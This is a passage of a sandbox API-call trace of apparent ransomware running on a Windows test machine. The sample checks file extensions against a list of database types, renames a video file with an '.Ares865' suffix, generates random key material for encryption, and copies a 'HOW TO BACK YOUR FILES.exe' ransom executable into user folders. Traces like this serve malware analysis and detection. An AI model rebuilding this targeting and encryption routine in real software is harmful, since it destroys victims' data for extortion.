lpString2="avhd") returned -1 [0091.985] lstrlenW (lpString="db") returned 2 [0091.985] lstrcmpiW (lpString1="vi", lpString2="db") returned 1 [0091.985] lstrlenW (lpString="db2") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="db2") returned -1 [0091.985] lstrlenW (lpString="db3") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="db3") returned -1 [0091.985] lstrlenW (lpString="dbf") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="dbf") returned -1 [0091.985] lstrlenW (lpString="mdf") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="mdf") returned -1 [0091.985] lstrlenW (lpString="mdb") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="mdb") returned -1 [0091.985] lstrlenW (lpString="sql") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="sql") returned -1 [0091.985] lstrlenW (lpString="sqlite") returned 6 [0091.985] lstrcmpiW (lpString1="gK.avi", lpString2="sqlite") returned -1 [0091.985] lstrlenW (lpString="sqlite3") returned 7 [0091.985] lstrcmpiW (lpString1="xgK.avi", lpString2="sqlite3") returned 1 [0091.985] lstrlenW (lpString="sqlitedb") returned 8 [0091.985] lstrcmpiW (lpString1="3xgK.avi", lpString2="sqlitedb") returned -1 [0091.985] lstrlenW (lpString="xml") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="xml") returned -1 [0091.985] lstrlenW (lpString="$er") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="$er") returned 1 [0091.985] lstrlenW (lpString="4dd") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="4dd") returned 1 [0091.985] lstrlenW (lpString="4dl") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="4dl") returned 1 [0091.985] lstrlenW (lpString="^^^") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="^^^") returned 1 [0091.986] lstrlenW (lpString="abs") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="abs") returned 1 [0091.986] lstrlenW (lpString="abx") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="abx") returned 1 [0091.986] lstrlenW (lpString="accdb") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accdb") returned 1 [0091.986] lstrlenW (lpString="accdc") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accdc") returned 1 [0091.986] lstrlenW (lpString="accde") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accde") returned 1 [0091.986] lstrlenW (lpString="accdr") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accdr") returned 1 [0091.986] lstrlenW (lpString="accdt") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accdt") returned 1 [0091.986] lstrlenW (lpString="accdw") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accdw") returned 1 [0091.986] lstrlenW (lpString="accft") returned 5 [0091.986] lstrcmpiW (lpString1="K.avi", lpString2="accft") returned 1 [0091.986] lstrlenW (lpString="adb") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.986] lstrlenW (lpString="adb") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.986] lstrlenW (lpString="ade") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="ade") returned 1 [0091.986] lstrlenW (lpString="adf") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="adf") returned 1 [0091.986] lstrlenW (lpString="adn") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="adn") returned 1 [0091.986] lstrlenW (lpString="adp") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="adp") returned 1 [0091.986] lstrlenW (lpString="alf") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="alf") returned 1 [0091.986] lstrlenW (lpString="ask") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="ask") returned 1 [0091.986] lstrlenW (lpString="btr") returned 3 [0091.986] lstrcmpiW (lpString1="avi", lpString2="btr") returned -1 [0091.987] lstrlenW (lpString="cat") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="cat") returned -1 [0091.987] lstrlenW (lpString="cdb") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="cdb") returned -1 [0091.987] lstrlenW (lpString="ckp") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="ckp") returned -1 [0091.987] lstrlenW (lpString="cma") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="cma") returned -1 [0091.987] lstrlenW (lpString="cpd") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="cpd") returned -1 [0091.987] lstrlenW (lpString="dacpac") returned 6 [0091.987] lstrcmpiW (lpString1="gK.avi", lpString2="dacpac") returned 1 [0091.987] lstrlenW (lpString="dad") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dad") returned -1 [0091.987] lstrlenW (lpString="dadiagrams") returned 10 [0091.987] lstrcmpiW (lpString1="UN3xgK.avi", lpString2="dadiagrams") returned 1 [0091.987] lstrlenW (lpString="daschema") returned 8 [0091.987] lstrcmpiW (lpString1="3xgK.avi", lpString2="daschema") returned -1 [0091.987] lstrlenW (lpString="db-journal") returned 10 [0091.987] lstrcmpiW (lpString1="UN3xgK.avi", lpString2="db-journal") returned 1 [0091.987] lstrlenW (lpString="db-shm") returned 6 [0091.987] lstrcmpiW (lpString1="gK.avi", lpString2="db-shm") returned 1 [0091.987] lstrlenW (lpString="db-wal") returned 6 [0091.987] lstrcmpiW (lpString1="gK.avi", lpString2="db-wal") returned 1 [0091.987] lstrlenW (lpString="dbc") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dbc") returned -1 [0091.987] lstrlenW (lpString="dbs") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dbs") returned -1 [0091.987] lstrlenW (lpString="dbt") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dbt") returned -1 [0091.987] lstrlenW (lpString="dbv") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dbv") returned -1 [0091.987] lstrlenW (lpString="dbx") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dbx") returned -1 [0091.987] lstrlenW (lpString="dcb") returned 3 [0091.987] lstrcmpiW (lpString1="avi", lpString2="dcb") returned -1 [0091.988] lstrlenW (lpString="dct") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dct") returned -1 [0091.988] lstrlenW (lpString="dcx") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dcx") returned -1 [0091.988] lstrlenW (lpString="ddl") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="ddl") returned -1 [0091.988] lstrlenW (lpString="dlis") returned 4 [0091.988] lstrcmpiW (lpString1=".avi", lpString2="dlis") returned -1 [0091.988] lstrlenW (lpString="dp1") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dp1") returned -1 [0091.988] lstrlenW (lpString="dqy") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dqy") returned -1 [0091.988] lstrlenW (lpString="dsk") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dsk") returned -1 [0091.988] lstrlenW (lpString="dsn") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dsn") returned -1 [0091.988] lstrlenW (lpString="dtsx") returned 4 [0091.988] lstrcmpiW (lpString1=".avi", lpString2="dtsx") returned -1 [0091.988] lstrlenW (lpString="dxl") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="dxl") returned -1 [0091.988] lstrlenW (lpString="eco") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="eco") returned -1 [0091.988] lstrlenW (lpString="ecx") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="ecx") returned -1 [0091.988] lstrlenW (lpString="edb") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="edb") returned -1 [0091.988] lstrlenW (lpString="epim") returned 4 [0091.988] lstrcmpiW (lpString1=".avi", lpString2="epim") returned -1 [0091.988] lstrlenW (lpString="fcd") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="fcd") returned -1 [0091.988] lstrlenW (lpString="fdb") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="fdb") returned -1 [0091.988] lstrlenW (lpString="fic") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="fic") returned -1 [0091.988] lstrlenW (lpString="flexolibrary") returned 12 [0091.988] lstrcmpiW (lpString1="NyUN3xgK.avi", lpString2="flexolibrary") returned 1 [0091.988] lstrlenW (lpString="fm5") returned 3 [0091.988] lstrcmpiW (lpString1="avi", lpString2="fm5") returned -1 [0091.989] lstrlenW (lpString="fmp") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fmp") returned -1 [0091.989] lstrlenW (lpString="fmp12") returned 5 [0091.989] lstrcmpiW (lpString1="K.avi", lpString2="fmp12") returned 1 [0091.989] lstrlenW (lpString="fmpsl") returned 5 [0091.989] lstrcmpiW (lpString1="K.avi", lpString2="fmpsl") returned 1 [0091.989] lstrlenW (lpString="fol") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fol") returned -1 [0091.989] lstrlenW (lpString="fp3") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fp3") returned -1 [0091.989] lstrlenW (lpString="fp4") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fp4") returned -1 [0091.989] lstrlenW (lpString="fp5") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fp5") returned -1 [0091.989] lstrlenW (lpString="fp7") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fp7") returned -1 [0091.989] lstrlenW (lpString="fpt") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="fpt") returned -1 [0091.989] lstrlenW (lpString="frm") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="frm") returned -1 [0091.989] lstrlenW (lpString="gdb") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.989] lstrlenW (lpString="gdb") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.989] lstrlenW (lpString="grdb") returned 4 [0091.989] lstrcmpiW (lpString1=".avi", lpString2="grdb") returned -1 [0091.989] lstrlenW (lpString="gwi") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="gwi") returned -1 [0091.989] lstrlenW (lpString="hdb") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="hdb") returned -1 [0091.989] lstrlenW (lpString="his") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="his") returned -1 [0091.989] lstrlenW (lpString="ib") returned 2 [0091.989] lstrcmpiW (lpString1="vi", lpString2="ib") returned 1 [0091.989] lstrlenW (lpString="idb") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="idb") returned -1 [0091.989] lstrlenW (lpString="ihx") returned 3 [0091.989] lstrcmpiW (lpString1="avi", lpString2="ihx") returned -1 [0091.990] lstrlenW (lpString="itdb") returned 4 [0091.990] lstrcmpiW (lpString1=".avi", lpString2="itdb") returned -1 [0091.990] lstrlenW (lpString="itw") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="itw") returned -1 [0091.990] lstrlenW (lpString="jet") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="jet") returned -1 [0091.990] lstrlenW (lpString="jtx") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="jtx") returned -1 [0091.990] lstrlenW (lpString="kdb") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="kdb") returned -1 [0091.990] lstrlenW (lpString="kexi") returned 4 [0091.990] lstrcmpiW (lpString1=".avi", lpString2="kexi") returned -1 [0091.990] lstrlenW (lpString="kexic") returned 5 [0091.990] lstrcmpiW (lpString1="K.avi", lpString2="kexic") returned -1 [0091.990] lstrlenW (lpString="kexis") returned 5 [0091.990] lstrcmpiW (lpString1="K.avi", lpString2="kexis") returned -1 [0091.990] lstrlenW (lpString="lgc") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="lgc") returned -1 [0091.990] lstrlenW (lpString="lwx") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="lwx") returned -1 [0091.990] lstrlenW (lpString="maf") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="maf") returned -1 [0091.990] lstrlenW (lpString="maq") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="maq") returned -1 [0091.990] lstrlenW (lpString="mar") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="mar") returned -1 [0091.990] lstrlenW (lpString="marshal") returned 7 [0091.990] lstrcmpiW (lpString1="xgK.avi", lpString2="marshal") returned 1 [0091.990] lstrlenW (lpString="mas") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="mas") returned -1 [0091.990] lstrlenW (lpString="mav") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="mav") returned -1 [0091.990] lstrlenW (lpString="maw") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="maw") returned -1 [0091.990] lstrlenW (lpString="mdbhtml") returned 7 [0091.990] lstrcmpiW (lpString1="xgK.avi", lpString2="mdbhtml") returned 1 [0091.990] lstrlenW (lpString="mdn") returned 3 [0091.990] lstrcmpiW (lpString1="avi", lpString2="mdn") returned -1 [0091.991] lstrlenW (lpString="mdt") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mdt") returned -1 [0091.991] lstrlenW (lpString="mfd") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mfd") returned -1 [0091.991] lstrlenW (lpString="mpd") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mpd") returned -1 [0091.991] lstrlenW (lpString="mrg") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mrg") returned -1 [0091.991] lstrlenW (lpString="mud") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mud") returned -1 [0091.991] lstrlenW (lpString="mwb") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="mwb") returned -1 [0091.991] lstrlenW (lpString="myd") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="myd") returned -1 [0091.991] lstrlenW (lpString="ndf") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="ndf") returned -1 [0091.991] lstrlenW (lpString="nnt") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="nnt") returned -1 [0091.991] lstrlenW (lpString="nrmlib") returned 6 [0091.991] lstrcmpiW (lpString1="gK.avi", lpString2="nrmlib") returned -1 [0091.991] lstrlenW (lpString="ns2") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="ns2") returned -1 [0091.991] lstrlenW (lpString="ns3") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="ns3") returned -1 [0091.991] lstrlenW (lpString="ns4") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="ns4") returned -1 [0091.991] lstrlenW (lpString="nsf") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="nsf") returned -1 [0091.991] lstrlenW (lpString="nv") returned 2 [0091.991] lstrcmpiW (lpString1="vi", lpString2="nv") returned 1 [0091.991] lstrlenW (lpString="nv2") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="nv2") returned -1 [0091.991] lstrlenW (lpString="nwdb") returned 4 [0091.991] lstrcmpiW (lpString1=".avi", lpString2="nwdb") returned -1 [0091.991] lstrlenW (lpString="nyf") returned 3 [0091.991] lstrcmpiW (lpString1="avi", lpString2="nyf") returned -1 [0091.991] lstrlenW (lpString="odb") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.992] lstrlenW (lpString="odb") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.992] lstrlenW (lpString="oqy") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="oqy") returned -1 [0091.992] lstrlenW (lpString="ora") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="ora") returned -1 [0091.992] lstrlenW (lpString="orx") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="orx") returned -1 [0091.992] lstrlenW (lpString="owc") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="owc") returned -1 [0091.992] lstrlenW (lpString="p96") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="p96") returned -1 [0091.992] lstrlenW (lpString="p97") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="p97") returned -1 [0091.992] lstrlenW (lpString="pan") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="pan") returned -1 [0091.992] lstrlenW (lpString="pdb") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="pdb") returned -1 [0091.992] lstrlenW (lpString="pdm") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="pdm") returned -1 [0091.992] lstrlenW (lpString="pnz") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="pnz") returned -1 [0091.992] lstrlenW (lpString="qry") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="qry") returned -1 [0091.992] lstrlenW (lpString="qvd") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="qvd") returned -1 [0091.992] lstrlenW (lpString="rbf") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="rbf") returned -1 [0091.992] lstrlenW (lpString="rctd") returned 4 [0091.992] lstrcmpiW (lpString1=".avi", lpString2="rctd") returned -1 [0091.992] lstrlenW (lpString="rod") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="rod") returned -1 [0091.992] lstrlenW (lpString="rodx") returned 4 [0091.992] lstrcmpiW (lpString1=".avi", lpString2="rodx") returned -1 [0091.992] lstrlenW (lpString="rpd") returned 3 [0091.992] lstrcmpiW (lpString1="avi", lpString2="rpd") returned -1 [0091.992] lstrlenW (lpString="rsd") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="rsd") returned -1 [0091.993] lstrlenW (lpString="sas7bdat") returned 8 [0091.993] lstrcmpiW (lpString1="3xgK.avi", lpString2="sas7bdat") returned -1 [0091.993] lstrlenW (lpString="sbf") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="sbf") returned -1 [0091.993] lstrlenW (lpString="scx") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="scx") returned -1 [0091.993] lstrlenW (lpString="sdb") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="sdb") returned -1 [0091.993] lstrlenW (lpString="sdc") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="sdc") returned -1 [0091.993] lstrlenW (lpString="sdf") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="sdf") returned -1 [0091.993] lstrlenW (lpString="sis") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="sis") returned -1 [0091.993] lstrlenW (lpString="spq") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="spq") returned -1 [0091.993] lstrlenW (lpString="te") returned 2 [0091.993] lstrcmpiW (lpString1="vi", lpString2="te") returned 1 [0091.993] lstrlenW (lpString="teacher") returned 7 [0091.993] lstrcmpiW (lpString1="xgK.avi", lpString2="teacher") returned 1 [0091.993] lstrlenW (lpString="tmd") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="tmd") returned -1 [0091.993] lstrlenW (lpString="tps") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="tps") returned -1 [0091.993] lstrlenW (lpString="trc") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.993] lstrlenW (lpString="trc") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.993] lstrlenW (lpString="trm") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="trm") returned -1 [0091.993] lstrlenW (lpString="udb") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="udb") returned -1 [0091.993] lstrlenW (lpString="udl") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="udl") returned -1 [0091.993] lstrlenW (lpString="usr") returned 3 [0091.993] lstrcmpiW (lpString1="avi", lpString2="usr") returned -1 [0091.993] lstrlenW (lpString="v12") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="v12") returned -1 [0091.994] lstrlenW (lpString="vis") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="vis") returned -1 [0091.994] lstrlenW (lpString="vpd") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="vpd") returned -1 [0091.994] lstrlenW (lpString="vvv") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="vvv") returned -1 [0091.994] lstrlenW (lpString="wdb") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="wdb") returned -1 [0091.994] lstrlenW (lpString="wmdb") returned 4 [0091.994] lstrcmpiW (lpString1=".avi", lpString2="wmdb") returned -1 [0091.994] lstrlenW (lpString="wrk") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="wrk") returned -1 [0091.994] lstrlenW (lpString="xdb") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="xdb") returned -1 [0091.994] lstrlenW (lpString="xld") returned 3 [0091.994] lstrcmpiW (lpString1="avi", lpString2="xld") returned -1 [0091.994] lstrlenW (lpString="xmlff") returned 5 [0091.994] lstrcmpiW (lpString1="K.avi", lpString2="xmlff") returned -1 [0091.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\XlFQyUGD8tGNyUN3xgK.avi.Ares865") returned 125 [0091.994] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\XlFQyUGD8tGNyUN3xgK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\xlfqyugd8tgnyun3xgk.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\XlFQyUGD8tGNyUN3xgK.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\xlfqyugd8tgnyun3xgk.avi.ares865"), dwFlags=0x1) returned 1 [0091.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\XlFQyUGD8tGNyUN3xgK.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\xlfqyugd8tgnyun3xgk.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62433) returned 1 [0091.995] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.996] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.996] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.996] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf6f0, lpName=0x0) returned 0x15c [0091.996] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf6f0) returned 0x190000 [0091.998] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.999] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.999] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.001] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz" [0092.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0092.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0092.001] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz") returned 73 [0092.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz" [0092.001] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.001] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.002] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.002] GetLastError () returned 0x0 [0092.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.002] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbf19aa0, ftCreationTime.dwHighDateTime=0x1d4cf7e, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.003] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.003] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.003] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.003] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.003] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23610, ftCreationTime.dwHighDateTime=0x1d4ce03, ftLastAccessTime.dwLowDateTime=0x4348f9e0, ftLastAccessTime.dwHighDateTime=0x1d4cba7, ftLastWriteTime.dwLowDateTime=0x4348f9e0, ftLastWriteTime.dwHighDateTime=0x1d4cba7, nFileSizeHigh=0x0, nFileSizeLow=0x6cd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5757_10vS5HYp.mkv", cAlternateFileName="5757_1~1.MKV")) returned 1 [0092.003] lstrcmpiW 